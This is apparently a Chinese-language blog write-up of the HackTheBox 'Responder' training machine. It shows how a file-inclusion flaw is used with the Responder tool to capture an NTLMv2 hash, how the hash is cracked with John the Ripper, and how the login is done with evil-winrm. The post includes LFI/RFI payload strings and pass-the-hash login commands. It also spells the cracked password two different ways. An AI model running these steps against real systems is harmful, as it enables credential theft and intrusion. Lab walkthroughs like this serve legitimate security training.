M21in的博客

分享和学习

0%

HTB-Responder靶机渗透

发表于 更新于

Task1

When visiting the web service using the IP address, what is the domain that we are being redirected to?

访问web服务的时候,被重定向的域是什么?

浏览器访问目标靶机的IP,发现重定位了地址

image-20260309195612135

unika.htb

Task2

Which scripting language is being used on the server to generate webpages?

问使用哪种语言生成网页,这里用nmap扫描网页端口就能扫出来

image-20260311143421424

扫描出语言是PHP

Task3

What is the name of the URL parameter which is used to load different language versions of the webpage?

问用于加载网页的URL参数名称是什么?

随便点进一个页面,然后看到网页传参的参数

image-20260311144309376

page

Task4

Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

问这三个选项哪个是本地文件包含漏洞的特征,很明显是第三个

../../../../../../../../windows/system32/drivers/etc/hosts

Task5

Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

这题问的是远程文件包含,就选带IP的

//10.10.14.6/somefile

Task6

What does NTLM stand for?

NTLM代表什么?

New Technology LAN Manager

Task7

Which flag do we use in the Responder utility to specify the network interface?

问Responder程序中使用哪个标志指定网络接口?

先下载一个Responder工具

sudo apt install respnder -y

这里自带的镜像超时了,所以自行更换了镜像源:

在/etc/apt/sources.list里面增加

1
2
deb http://mirrors.aliyun.com/kali kali-rolling main non-free non-free-firmware contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free non-free-firmware contrib

然后下载完responder工具,直接–help查询

image-20260311152011178

找到-i选项是可以指定网络接口的

-I

Task8

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.

问john的全名叫什么?

john the ripper

Task9

What is the password for the administrator user?

问administrator的密码

这里当时想用wsl做,看到网上很多都是直接用的kali,wsl需要配置一下代理,因为被重定向了,所以要修改/etc/hosts文件

image-20260311222407224

左边写要访问的地址,右边是被重定向的地址,这时候再访问就能直接看到目标靶机的网页内容。然后到网页,因为他有文件包含的漏洞,所以直接进行远程文件包含,同时监听机使用Responder接受反弹

image-20260311223237213

此时靶机进行远程文件包含,反弹IP为监听机IP

image-20260311223425325

看到反弹回了administrator的密码hash值,然后再用上文的john工具爆破密码

爆破出来密码是banminton

Task10

We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

问这个监听TCP的端口是什么,拿nmap扫描一下

image-20260311234040289

5985

Submit Root flag

根据task9里面获得的用户名和密码,直接使用evil-winrm工具连上去,获取flag

evil-winrm -i IP -u administrator -p badminton

image-20260318151455546

image-20260318151546407

总结

responder

Responder 是一款可以在局域网模拟各种服务器的内网渗透神器

这题里面用了Responder的监听

Responder -I tun0在内网中监听tun0网卡

为什么是tun0?

因为这是连上的靶机,openvpn上明确指明了是tun0,可以通过ip a命令查看,换成其他的话还是得按实际情况来

然后在内网中监听,等目标IP发送身份验证(NTLM)响应时,他会伪装成服务器接收他的响应,并弹回hash值

evil-winrm

Evil-WinRM是一个开源渗透测试框架,旨在提供一种简单有效的方法来自动执行各种任务并在远程Windows机器上运行复杂的命令。

这题能用是因为nmap扫描到5985是打开的,而且他跟responder一样支持NTLM认证,所以可以登录系统

这里靶机的用法是evil-winrm -i IP -u administrator -p password,也可以直接用hash值

evil-winrm -i IP -u administrator -H hash,相当于Linux上的ssh